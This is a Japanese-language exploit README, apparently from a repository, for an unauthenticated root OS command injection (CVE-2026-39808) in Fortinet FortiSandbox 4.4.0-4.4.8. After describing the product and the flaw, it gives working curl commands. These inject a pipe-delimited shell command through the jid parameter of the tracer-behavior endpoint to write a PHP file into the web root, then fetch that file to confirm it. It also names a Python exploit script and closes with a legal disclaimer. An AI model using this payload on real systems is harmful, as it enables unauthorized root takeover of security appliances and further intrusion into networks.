
Fortinet FortiSandbox 4.4.0-4.4.8 - tracer-behaviorエンドポイントを介したOSコマンドインジェクション
Fortinet FortiSandbox 4.4.0-4.4.8 - tracer-behavior エンドポイントを介した OS コマンドインジェクション
Fortinet FortiSandbox は、隔離された環境を作成し、不審なファイル、URL、およびネットワークトラフィックを分析して悪意のある動作を検出する高度な脅威保護ソリューションです。静的解析、動的解析、AI搭載の機械学習、FortiGuard からの脅威インテリジェンスを組み合わせて、従来のシグネチャベースの防御をすり抜けるゼロデイ脅威、回避型マルウェア、ランサムウェア、標的型攻撃を検出します。企業は、新たな脅威、特に未知のマルウェアや高度な持続的脅威(APT)から保護するために FortiSandbox を導入すべきです。これは、疑わしいコンテンツを本番システムに到達する前に安全な隔離環境で自動的に実行(デトネーション)します。また、広範な Fortinet Security Fabric と統合され、物理アプライアンス、仮想マシン、クラウドサービス、または コンテナ化ソリューション としてさまざまなネットワークアーキテクチャに展開可能です。
CVE-2026-39808 は、FortiSandbox バージョン 4.4.0 から 4.4.8 に影響する重大な OSコマンドインジェクションの脆弱性 です。この欠陥は、OSコマンドの構築に使用される前にユーザー制御の入力に含まれる特殊要素が適切に無効化されないこと(CWE-78)に起因し、具体的には不特定のAPIエンドポイントに影響を与えます。認証されていない攻撃者は、細工されたHTTPリクエストを送信することで、基盤となるシステム上で 任意のOSコマンド を root権限 で実行できます。悪用に成功すると、攻撃者は FortiSandbox アプライアンスを完全に制御し、分析されたマルウェアサンプルへのアクセス、機密構成データの外部流出、接続されたネットワークセグメントへのピボット、または企業環境内でのさらなる水平移動の足がかりとして侵害されたデバイスを利用することが可能になります。この脆弱性は現在、実際の環境で積極的に悪用されています。
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
"http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
python CVE-2026-39808-X7.py
このリポジトリとその内容は、正当なセキュリティ研究、許可されたペネトレーションテスト、教育研究、および防御目的のためにのみ提供されています。本資料にアクセスまたは使用することにより、あなたは自身の活動がすべての該当法令に準拠していること、および所有していないシステムに対してこれらの手法をテストまたは適用する前に適切な許可を得ていることについて完全な責任を負うことを認めるものとします。
このプロジェクトの作者およびメンテナは、本情報の適用に起因するいかなる損害、法的結果、または誤用についても一切の責任を負いません。不正アクセス、悪意のある活動、または違法な目的での使用は明示的に禁止されており、サポートされません。
責任を持って使用してください。法令を遵守してください。自分が所有しているか、明示的な書面による許可を得ているもののみをテストしてください。
SCT-PL